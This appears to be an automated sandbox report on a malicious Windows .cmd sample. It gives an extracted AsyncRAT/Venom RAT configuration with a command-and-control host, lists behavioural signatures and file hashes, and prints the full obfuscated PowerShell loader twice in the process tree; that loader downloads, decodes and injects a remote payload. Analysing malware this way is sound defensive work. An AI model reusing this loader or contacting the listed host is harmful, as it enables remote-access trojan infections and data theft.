Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 13:19
Static task
static1
Behavioral task
behavioral1
Sample
e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728.cmd
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728.cmd
Resource
win10v2004-20240508-en
General
-
Target
e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728.cmd
-
Size
6KB
-
MD5
1b315096e07f2cbe4bb1dae37bf115e5
-
SHA1
183d4109803b7de7f8c679e5cf12d215bd6b3871
-
SHA256
e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728
-
SHA512
b7d3fa6cbb79537c827bf80b29c0be4b11036922717d05ae79e301071651c7a1cbcf114fa1b9b0459e874c01de24bc78d67f171ecc9bba09f0ba039a7fea2683
-
SSDEEP
96:k+m8Z1rXchtQtvV3c7FK+37kcu/WlJVhe9glzjAqvko644Omqnds29D6tCmXPWC7:B6hQOKM7kc3De9glzjFkFXCj9DACy
Malware Config
Extracted
asyncrat
5.0.5
Venom Clients
xvern429.duckdns.org:8890
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 5 2000 powershell.exe 7 2000 powershell.exe 9 2000 powershell.exe 11 2000 powershell.exe 13 2000 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 384 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2468 powershell.exe 384 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2468 set thread context of 384 2468 powershell.exe wab.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 2000 powershell.exe 2468 powershell.exe 2468 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2468 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2000 powershell.exe Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 384 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exepowershell.exepowershell.exedescription pid process target process PID 1048 wrote to memory of 2000 1048 cmd.exe powershell.exe PID 1048 wrote to memory of 2000 1048 cmd.exe powershell.exe PID 1048 wrote to memory of 2000 1048 cmd.exe powershell.exe PID 2000 wrote to memory of 2532 2000 powershell.exe cmd.exe PID 2000 wrote to memory of 2532 2000 powershell.exe cmd.exe PID 2000 wrote to memory of 2532 2000 powershell.exe cmd.exe PID 2000 wrote to memory of 2468 2000 powershell.exe powershell.exe PID 2000 wrote to memory of 2468 2000 powershell.exe powershell.exe PID 2000 wrote to memory of 2468 2000 powershell.exe powershell.exe PID 2000 wrote to memory of 2468 2000 powershell.exe powershell.exe PID 2468 wrote to memory of 1624 2468 powershell.exe cmd.exe PID 2468 wrote to memory of 1624 2468 powershell.exe cmd.exe PID 2468 wrote to memory of 1624 2468 powershell.exe cmd.exe PID 2468 wrote to memory of 1624 2468 powershell.exe cmd.exe PID 2468 wrote to memory of 384 2468 powershell.exe wab.exe PID 2468 wrote to memory of 384 2468 powershell.exe wab.exe PID 2468 wrote to memory of 384 2468 powershell.exe wab.exe PID 2468 wrote to memory of 384 2468 powershell.exe wab.exe PID 2468 wrote to memory of 384 2468 powershell.exe wab.exe PID 2468 wrote to memory of 384 2468 powershell.exe wab.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"3⤵PID:2532
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"4⤵PID:1624
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:384
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD590a24f720152d29a133da27b6fd0dd04
SHA1c4e6424516dbf39806901d66883189a04cb3e40f
SHA256111395bd316b6eb77774f94795695dbdf1ab506259c9170cc712b6650183bde7
SHA5129a7d59191ca1f930d831e380bd9ae022c3a2e9b3d7f7ac4406bec6a1b467bf6dcc54297cb4628d2e4de08787148772c82803ad4c400a449b8e85cc7f2024d890
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BT882B7A56PPU8YNELAW.temp
Filesize7KB
MD561bfc6cb9342a6f706458473f33897a1
SHA1fbaaff0e17ee98640b7d4d174fa5b092557dee80
SHA25618261797c323787e3c5dbccb44a7cb95386c72be7ce7e190bfde5d1dd5259b00
SHA5129769b2b8bec869db85b1a1e352dbbcd6e40b03edabce60d647425d84bdc3e1859b41a17439436271f3cd2809b91f995639282d62303ca52003cac7171005a974
-
Filesize
408KB
MD52012051e619942968ded1f085ec39637
SHA1f90b37de2d7d3a42be724ede56fcaebf200b18e8
SHA256cb6359c5489ad4e7eabe7ee810752d2ae5d305cf060ad345950cbbc9f9460c82
SHA51217f73368229c4f7daea3ef2d6e1d7ae75b06571ad0576a556b49e50634aa065e49dafa95eb5da4af0d393619abed8a68a92928c5797f240ce799bc93e0aeb053